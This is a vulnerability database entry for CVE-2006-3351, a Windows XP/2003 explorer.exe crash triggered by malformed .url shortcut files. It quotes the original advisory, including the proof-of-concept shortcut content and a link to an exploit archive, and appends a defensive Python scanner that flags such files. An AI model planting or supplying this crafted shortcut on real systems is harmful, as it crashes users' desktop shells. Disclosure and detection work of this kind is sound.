Microsoft Windows explorer.exe URL File Format Overflow Vulnerability

Vulnerability ID: 1194285 | Vulnerability type: Buffer overflow
Published: 2006-07-05 | Updated: 2006-08-28
CVE ID: CVE-2006-3351 | CNNVD-ID: CNNVD-200607-022
Platform: N/A | CVSS score: 5.4
|Vulnerability source
https://cxsecurity.com/issue/WLB-2006070037
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-022
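|Vulnerability details
Microsoft Windows is a series of operating systems released by Microsoft. The Windows shell program explorer.exe mishandles ".url" files that contain malformed data, and a local attacker may exploit this vulnerability to crash the explorer.exe process on the user's machine. If explorer.exe parses a *.url file containing a specially formatted URL, it crashes. The crash is triggered even when the user tries to delete the file through Windows Explorer.
|Vulnerability EXP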
Windows Explorer URL File format overflow

Affected Vendor:

Microsoft

Affected Products:

Windows XP ALL

Windows 2003 ALL

Vulnerability Details:

When explorer.exe parses a *.url file which contains a URL in the following format, explorer.exe will crash.

if you create the Exploit.url on Desktop

Explorer will Crash...Crash...Crash...Crash...Crash...Crash...

if you want to del exploit.url

open taskmgr.exe

open cmd.exe

then cd your desktop

del exploit.url

Exploit:

[InternetShortcut]

url=file:file:file:file:file:file:file:file:file:file:file:file:file:fil
e:file:file:file:file:file:file:file:file:file:file:file:file:file:file:

Attachment:

http://hitcon.org/Nanika-desktop_explore_0day.rar

you can drop in desktop :P

http://hitcon.org

http://www.chroot.org
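
A defender-side check for the shortcut format shown in the advisory above, as an added example that is not part of the original advisory or of this database entry: it reads .url files as raw bytes rather than through the shell and reports any whose URL= value repeats its leading scheme. The one-repeat threshold, the function names and the sample bytes are assumptions constructed for illustration.

```python
import re
from pathlib import Path

# Assumption (not from the advisory): any back-to-back repeat of the scheme is malformed.
MAX_REPEATS = 1
SCHEME = re.compile(r"([a-z][a-z0-9+.-]*):")

def shortcut_url(data):
    """Return the URL= value of the [InternetShortcut] section, or None."""
    if data[:2] in (b"\xff\xfe", b"\xfe\xff"):        # UTF-16 with BOM
        text = data.decode("utf-16", "replace")
    else:                                              # ANSI, optional UTF-8 BOM
        text = data.decode("latin-1").lstrip("\xef\xbb\xbf")
    section = ""
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif section == "internetshortcut" and "=" in line:
            key, _, value = line.partition("=")
            if key.strip().lower() == "url":
                return value.strip()
    return None

def scheme_repeats(url):
    """Count consecutive copies of the leading scheme (1 for a normal URL)."""
    url = url.lower()
    first = SCHEME.match(url)
    if not first:
        return 0
    prefix = first.group(0)
    count = 0
    while url.startswith(prefix, count * len(prefix)):
        count += 1
    return count

def scan(root):
    """Return (path, repeats) for every suspicious .url file under root."""
    hits = []
    for path in Path(root).rglob("*"):
        if path.suffix.lower() == ".url" and path.is_file():
            n = scheme_repeats(shortcut_url(path.read_bytes()) or "")
            if n > MAX_REPEATS:
                hits.append((path, n))
    return hits

# Constructed sample inputs (not taken from a real system).
BENIGN = b"[InternetShortcut]\r\nURL=http://example.com/\r\n"
MALFORMED = b"[InternetShortcut]\r\nurl=" + b"file:" * 28 + b"\r\n"
```

Calling `scan()` on a profile or share root lists the files to remove from a command prompt, as the advisory describes, before anyone browses to them.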
|References

Source: BID
Name: 18838
Link: http://www.securityfocus.com/bid/18838
Source: BUGTRAQ
Name: 20060706 Re: Windows Explorer URL File format overflow
Link: http://www.securityfocus.com/archive/1/archive/1/439660/100/200/threaded
Source: BUGTRAQ
Name: 20060705 Windows Explorer URL File format overflow
Link: http://www.securityfocus.com/archive/1/archive/1/439153/100/0/threaded
Source: XF
Name: win-explorer-url-dos(27567)
Link: http://xforce.iss.net/xforce/xfdb/27567
Source: SREASON
Name: 1186
Link: http://securityreason.com/securityalert/1186